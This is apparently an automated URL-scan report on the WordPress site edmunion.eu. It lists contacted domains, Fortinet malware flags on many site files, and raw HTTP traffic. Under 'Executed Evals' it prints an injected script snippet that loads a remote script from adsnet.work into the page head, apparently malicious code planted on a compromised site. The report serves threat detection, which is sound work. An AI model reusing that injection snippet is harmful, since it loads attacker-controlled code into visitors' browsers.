Overview

URL edmunion.eu/
IP 77.240.112.203 (Spain)
ASN #16371 acens Technologies, S.L.
UserAgent Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed 2022-11-04 20:42:32 UTC
IDS alerts 0
Blocklist alert 22
urlquery alerts No alerts detected
Tags None

Domain Summary (13)

Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
edmunion.eu (1) 0 2016-10-13 18:05:22 UTC 2022-11-04 05:35:10 UTC 77.240.112.203 Unknown ranking
r3.o.lencr.org (8) 344 No data No data 23.36.77.32
content-signature-2.cdn.mozilla.net (1) 1152 No data No data 34.160.144.191
www.edmunion.eu (33) 0 2017-02-20 06:29:34 UTC 2022-10-15 07:50:19 UTC 77.240.112.203 Unknown ranking
fonts.gstatic.com (3) 0 2014-09-09 00:40:21 UTC 2022-11-04 10:24:09 UTC 216.58.207.195 Domain (gstatic.com) ranked at: 540
fonts.googleapis.com (3) 8877 2013-06-10 20:14:26 UTC 2022-11-04 17:35:41 UTC 142.250.74.10
ocsp.digicert.com (3) 86 2012-05-21 07:02:23 UTC 2020-05-02 20:58:10 UTC 93.184.220.29
contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-11-04 05:51:42 UTC 34.117.237.239
ocsp.pki.goog (9) 175 2018-07-01 06:43:07 UTC 2020-05-02 20:58:16 UTC 142.250.74.35
push.services.mozilla.com (1) 2140 2014-10-24 08:27:06 UTC 2020-05-03 10:09:39 UTC 52.42.234.253
adsnet.work (1) 0 2015-06-06 16:23:15 UTC 2022-11-02 18:40:40 UTC 193.3.19.36 Unknown ranking
img-getpocket.cdn.mozilla.net (7) 1631 2018-06-21 23:36:00 UTC 2020-02-19 04:43:25 UTC 34.120.237.76
hydrahydra.kim (1) 0 2021-10-19 18:50:29 UTC 2022-11-03 09:50:45 UTC 193.3.19.36 Unknown ranking

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro
 No alerts detected

Blocklists

OpenPhish
 No alerts detected

PhishTank
 No alerts detected

Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-11-04 2 edmunion.eu/ Malware
2022-11-04 2 www.edmunion.eu/ Malware
2022-11-04 2 www.edmunion.eu/wp-includes/js/wp-emoji-release.min.js?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/lity/lity.min.css?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/css/new-style.css?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-includes/css/classic-themes.min.css?ver=1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/css/slick.min.css?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/font-awesome/css/font-awesome.m (...) Malware
2022-11-04 2 www.edmunion.eu/wp-includes/css/dist/block-library/style.min.css?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/plugins/bold-page-builder/css/front_end/dummy.cs (...) Malware
2022-11-04 2 www.edmunion.eu/wp-content/plugins/bold-page-builder/css/front_end/content_ (...) Malware
2022-11-04 2 www.edmunion.eu/wp-content/plugins/bold-page-builder/content_elements_misc/ (...) Malware
2022-11-04 2 www.edmunion.eu/wp-content/plugins/bold-page-builder/content_elements_misc/ (...) Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/bootstrap.min.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/jquery.circliful.min.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/jquery.downCount.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-includes/js/jquery/jquery.min.js?ver=3.6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/lity/lity.min.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/denorious-main.js?ver=1.0.0 Malware
2022-11-04 2 www.edmunion.eu/wp-includes/js/comment-reply.min.js?ver=6.1 Malware
2022-11-04 2 www.edmunion.eu/wp-content/themes/denorious/js/scrolltotop/totop.js?ver=1.0.0 Malware
2022-11-04 2 adsnet.work/scripts/placer.js Malware

mnemonic secure dns
 No alerts detected

Quad9 DNS
 No alerts detected


Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 1 reports on IP: 77.240.112.203
Date UQ / IDS / BL URL IP
2022-11-04 20:42:32 +0000 0 - 0 - 22 edmunion.eu/ 77.240.112.203


Last 5 reports on ASN: acens Technologies, S.L.
Date UQ / IDS / BL URL IP
2023-02-01 15:57:53 +0000 0 - 3 - 0 afinad.biz/ 82.194.68.67
2023-01-29 19:45:31 +0000 0 - 2 - 0 www.flexshoppingcenter.com/wp-admin/includes/ (...) 82.194.68.52
2023-01-29 15:18:45 +0000 0 - 8 - 0 app.wannacash.com/r1/1964587/25/qqiipf 77.240.115.205
2023-01-28 14:36:00 +0000 0 - 1 - 0 campus.funiber.org/nutriber/Instalador.exe?_g (...) 217.116.15.70
2023-01-27 15:19:00 +0000 0 - 1 - 0 campus.funiber.org/nutriber/Instalador.exe?_g (...) 217.116.15.70


Last 1 reports on domain: edmunion.eu
Date UQ / IDS / BL URL IP
2022-11-04 20:42:32 +0000 0 - 0 - 22 edmunion.eu/ 77.240.112.203


No other reports with similar screenshot

JavaScript

Executed Scripts (21)

Executed Evals (1)
#1 JavaScript::Eval (size: 195) - SHA256: d1255c9406d7ac6d3d53f2d0462c087b20576eb1a3f57d7eb0c1d1ee5b228fd2
var script = document.createElement('script');
script.onload = function() {};
script.src = "https://adsnet.work/scripts/placer.js";
document.getElementsByTagName('head')[0].appendChild(script);

Executed Writes (0)


HTTP Transactions (72)


Request Response
                                        
                                            GET / HTTP/1.1 
Host: edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         77.240.112.203
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 162
Connection: keep-alive
Location: http://www.edmunion.eu/


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF line terminators
Size:   162
Md5:    4f8e702cc244ec5d4de32740c0ecbd97
Sha1:   3adb1f02d5b6054de0046e367c1d687b6cdf7aff
Sha256: 9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "B93410A9D62DA3F219796D753B61A0F730CC272C13596724AA9D20EFBA298B44"
Last-Modified: Thu, 03 Nov 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5608
Expires: Fri, 04 Nov 2022 22:15:49 GMT
Date: Fri, 04 Nov 2022 20:42:21 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5979
Cache-Control: max-age=138503
Date: Fri, 04 Nov 2022 20:42:21 GMT
Etag: "6364dbd9-1d7"
Expires: Sun, 06 Nov 2022 11:10:44 GMT
Last-Modified: Fri, 04 Nov 2022 09:31:05 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5979
Cache-Control: max-age=138503
Date: Fri, 04 Nov 2022 20:42:21 GMT
Etag: "6364dbd9-1d7"
Expires: Sun, 06 Nov 2022 11:10:44 GMT
Last-Modified: Fri, 04 Nov 2022 09:31:05 GMT
Server: ECS (ska/F717)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "73A068F907CC50DD60AF18D545B4264DD44BC4B9F40BF9ADFCEEA157FDC33099"
Last-Modified: Thu, 03 Nov 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9718
Expires: Fri, 04 Nov 2022 23:24:19 GMT
Date: Fri, 04 Nov 2022 20:42:21 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         34.160.144.191
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
x-amz-id-2: cPN02Ux7I16fmzILN21UChAT+u1FvNe/j9CO2pFvCtXF9GKzQpm3fFLJTsTx+7ISAhg7oHm76MM=
x-amz-request-id: DS5SWMH4WHBPYBN1
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
content-length: 5348
via: 1.1 google
date: Fri, 04 Nov 2022 19:46:54 GMT
age: 3327
last-modified: Fri, 30 Sep 2022 18:50:55 GMT
etag: "67d5a988edcda47bc3b3b3f65d32b4b6"
cache-control: public,max-age=3600
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    67d5a988edcda47bc3b3b3f65d32b4b6
Sha1:   d4f0e0da8b3690cc7da925026d3414b68c7d954f
Sha256: 55e4848e3ec682e808ce7ee70950f86179c43af4f81926d826a95edfda395a78
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Fri, 04 Nov 2022 20:42:21 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            GET / HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 46334
Connection: keep-alive
X-Pingback: http://www.edmunion.eu/xmlrpc.php
Link: <http://www.edmunion.eu/index.php?rest_route=/>; rel="https://api.w.org/", <http://www.edmunion.eu/index.php?rest_route=/wp/v2/pages/2>; rel="alternate"; type="application/json", <http://www.edmunion.eu/>; rel=shortlink
X-Powered-By: PHP/7.4.32, PleskLin


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (9381), with CRLF, LF line terminators
Size:   46334
Md5:    1d2e19bb632f7021564086e7cb83dc76
Sha1:   febb7103fba547542650f4fbcad36d1c9370c27e
Sha256: ed09ef38fcc74089a6b668f1d5a4eff741eaeacd4ab7c29d88d6ad20844469e8

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:21 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:21 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:21 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-includes/js/wp-emoji-release.min.js?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 18617
Last-Modified: Wed, 25 May 2022 00:45:28 GMT
Connection: keep-alive
ETag: "628d7c28-48b9"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (15660)
Size:   18617
Md5:    32beb68a374e3aeac00abdf9e12b84ea
Sha1:   b5d18aa625e8696dd9d07cd0869337717b211ae0
Sha256: 5aad5fbd4238981a9ff5e2772ff1353dfe1a801fb49542fe157418c1438f7782

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/lity/lity.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 3349
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-d15"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (3288), with CRLF line terminators
Size:   3349
Md5:    a89216bdb476bff1f1e4096bab4df235
Sha1:   a0651cb4bf0af858c55f5564360584d8af19978e
Sha256: 3a37f82bdd6c846240ab0762b6fbda3d5b4baa60dbef3287792b00bb9fe8e7c0

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/css/jquery.circliful.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 886
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
ETag: "376-56695f8083140"
Accept-Ranges: bytes
X-Powered-By: PleskLin


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   886
Md5:    b4a6416d3ee6a9e5685066fa0d4a733f
Sha1:   4bb15d611533596e602ab5e2bbea18393f70e510
Sha256: c600045104a8b512eaa59d1f3ef5fae13b712899d7d82eb93a9ba6b5ae160767
                                        
                                            GET /wp-content/themes/denorious/css/new-style.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 8746
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-222a"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   8746
Md5:    326883fa2b5eb5684897076e2d028b53
Sha1:   7f323d0bc6c7812310b129618764b47c5d1dd3df
Sha256: a67d285847fc3b8f704e29629bffb72ceeec9adc59b74855025deec41de77d0c

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 217
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Wed, 02 Nov 2022 01:45:15 GMT
ETag: "d9-5ec72fdfd3c03"
Accept-Ranges: bytes
X-Powered-By: PleskLin


--- Additional Info ---
Magic:  ASCII text
Size:   217
Md5:    95e891f28e44a9b314c09545d86be2b7
Sha1:   f9b13a8bd47273b086a0a07df15f314e0af0bc3e
Sha256: 5a5f39391fbf5b06db84b8f9716d53de575ee97a627d2c5f12f79a991a671eb5

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/css/slick.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 1290
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-50a"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (1290), with no line terminators
Size:   1290
Md5:    19d947f5a564794121cba0e962520b68
Sha1:   41e81b392d26a4aaaf9fda074d1ed2d802f2d6a8
Sha256: 8f24862077717aa659bc9f521e03cd8dbb013fcae88a3eff5a3824a064c92029

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/font-awesome/css/font-awesome.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 22096
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-5650"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (21880), with CRLF line terminators
Size:   22096
Md5:    3aae6eb815f965c9bfc0f583fcfae4e8
Sha1:   9f78b698a990bb613395b8fab62f798f271c87be
Sha256: 71dd9e4d26b8f059c03e489be1f506177affa87c91cb5150657a423739a9fa7e

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/bold-page-builder/slick/slick.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 1729
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
Connection: keep-alive
ETag: "5c14475c-6c1"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   1729
Md5:    13b1b6672b8cfb0d9ae7f899f1c42875
Sha1:   6e9d13342a11a8cfd9e42ee243eaeae01cda4e25
Sha256: d917660c3d6f7aad32ebc4b0012c6d0bb84a13e201a012e334bcca4b9f4686c9
                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 94821
Last-Modified: Wed, 02 Nov 2022 01:45:15 GMT
Connection: keep-alive
ETag: "6361cbab-17265"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (47826)
Size:   94821
Md5:    4cdcd4a2c77fccb74825eaf2d6733091
Sha1:   00d4ad404f681af9044bb4cc6ed5e2e9f641cc4a
Sha256: 187af6783dd59cd3b9dd90e77b3daa1509c1c3c18f5ce5d6fe2133f9bc3828df

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5722
Cache-Control: max-age=133188
Date: Fri, 04 Nov 2022 20:42:21 GMT
Etag: "6364c817-1d7"
Expires: Sun, 06 Nov 2022 09:42:09 GMT
Last-Modified: Fri, 04 Nov 2022 08:06:47 GMT
Server: ECS (ska/F705)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /wp-content/plugins/bold-page-builder/css/front_end/dummy.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 0
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
ETag: "0-57d046ddb8f00"
Accept-Ranges: bytes
X-Powered-By: PleskLin


--- Additional Info ---
Magic:  
Size:   0
Md5:    d41d8cd98f00b204e9800998ecf8427e
Sha1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-content/themes/denorious/style.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 169350
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-29586"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   169350
Md5:    503d50f5679c93078a55699b93bf125f
Sha1:   9a3170804c495ddd24fa1e0771c00c7dac9a6e03
Sha256: 222ba21e54eb3c1e2a7ba146d4141558468a53eaf3a9f0bffbef6aa20fede378
                                        
                                            GET /wp-content/themes/denorious/css/bootstrap.min.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
